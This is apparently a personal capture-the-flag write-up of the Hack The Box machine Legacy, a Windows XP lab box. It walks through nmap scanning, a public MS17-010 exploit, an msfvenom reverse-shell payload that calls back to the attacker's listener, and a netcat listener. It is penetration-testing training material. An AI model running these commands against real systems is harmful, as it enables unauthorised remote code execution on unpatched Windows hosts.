Taking down Legacy (A Window Machine) without using Metasploit
Today I am going to take down one simple box from Hack The Box. Recently I purchased a VIP lab access. By the way, the machine name is called Legacy and it’s a window machine.
This is my first write-up of machines from that lab.
Since we already have the machine IP address (it’s shown in the web portal), let’s check what ports are open and what services are running..
Overview: Machine IP: 10.10.10.4 Kali Linux : 10.10.14.10 Target: 1. To get the user flag 2. To get the root flag
Information Gathering Phase:
nmap -sC -sV 10.10.10.4 -Pn
Nmap scan report for 10.10.10.4 PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
From the above result, we can conclude that the target machine is running Window XP and, it has port 139 and 445 opened. Besides, it is running Samba server.
If you want to know more, you can also perform the above command with -v option. (However, the screenshot attached was the result of command without the -v option)
nmap -sC -sV -v -p139,445 10.10.10.4 -o nmap.log -Pn
Based on the above result, we are certain that this Samba version is vulnerable. However, the following NSE script (nmap script) can help us to get a better vulnerability detail and, it will also recommend related exploits if it has any.
nmap --script smb-vuln* -o nmap_smb_vul.log -Pn 10.10.10.4
PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds Host script results: | smb-vuln-ms08-067: | VULNERABLE: | Microsoft Windows system vulnerable to remote code execution (MS08-067) | State: VULNERABLE | IDs: CVE:CVE-2008-4250 | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary | code via a crafted RPC request that triggers the overflow during path canonicalization. | | Disclosure date: 2008-10-23 | References: | https://technet.microsoft.com/en-us/library/security/ms08-067.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250 |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug) | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
You can clearly see that it has suggested two exploits however, since the first exploit is having some issue (which I colored red) therefore, I am going to use the second exploit. (Note: I must share with you that it is not absolute approach, because sometimes a minor changes in the exploit might work, so try to fix the issues of the first exploit if time permits you).
Although I found many exploits regarding MS17-010, I am going to do it without using Metasploit (which is a powerful automating framework or tool). So let’s do some shopping through online.
We are going to clone a GitHub link… (there will be many GitHub account having the exploit details of MS17-010. But, we need one with “send script” (send_and_execute.py) to send the exploit from our Host Machine (Kali Linux) to that Remote Machine(Window Machine). Since many GitHub repository doesn’t have the script send_and_execute.py therefore I am emphasizing about it. Perhaps if you read further you might get to know the importance of it)
git clone https://github.com/helviojunior/MS17-010 cd MS17-010
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.18 LPORT=1234 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
I was little skeptical using msfvenom at the beginning as in the OSCP exam, we are allowed to use Metasploit only twice (and my plan is not to use any). Nevertheless, after reading couple of blogs of senior OSCPians, I understood we can use msfvenom and they discouraged to use Meterpreter.
-p payload LHOST localhost LPORT Local Port I might need to explain a little regarding EXITFUNC=thread - This EXITFUNC option effectively sets a function hash in the payload that specifies a DLL and function to call when the payload is complete. - thread method is used in most exploitation scenarios where the exploited process (e.g. IE) runs the shellcode in a sub-thread and exiting this thread results in a working application/system (clean exit) - To know more, kindly visit this link -f output format -a architecture -o output file and path
If you have observed carefully, you might have noticed that our exploit MS17-010.exe (is using payload windows/shell_reverse_tcp) will provide us a reverse connection to our Kali Linux Machine (or Local Host) on LPORT 1234.
Therefore, I will wait a reverse connection to my LHOST at LPORT 1234.
nc -lvp 1234
And on another Terminal (remember to cd ms17-010 folder if you are freshly opening a Terminal), perform the following command. (By the way, I highly recommend you to use tmux tool to split the terminal to enhance your productivity)
python send_and_execute.py 10.10.10.4 ms17-010.exe
Yes, if you are successful; on your terminal (which was listening at port 1234 will get the reverse connection), you will see like the following screenshot. (Focus on the highlight area)
I will not bore you with my English (Tibetish lol), so I have attached the following steps in screenshot.